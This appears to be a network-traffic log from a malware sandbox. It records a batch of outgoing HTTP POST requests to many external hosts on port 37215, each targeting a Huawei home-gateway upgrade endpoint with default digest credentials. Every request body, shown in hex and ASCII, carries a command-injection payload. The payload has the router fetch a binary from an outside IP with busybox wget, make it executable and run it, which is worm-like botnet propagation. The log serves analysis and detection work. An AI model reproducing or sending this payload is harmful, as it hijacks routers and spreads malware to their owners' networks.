                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              324192.168.2.154694445.37.3.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207823992 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              325192.168.2.1547922122.12.53.15437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207854033 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              326192.168.2.1542106102.217.80.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207859993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              327192.168.2.1536512148.184.135.23237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207894087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              328192.168.2.1558094157.19.170.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207945108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              329192.168.2.1545202156.78.144.15337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207972050 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              330192.168.2.1547794102.246.39.2937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207984924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              331192.168.2.1542954181.149.203.10837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.208061934 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              332192.168.2.155673637.52.80.16437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.208106995 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              333192.168.2.1545302122.2.63.16837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.208182096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
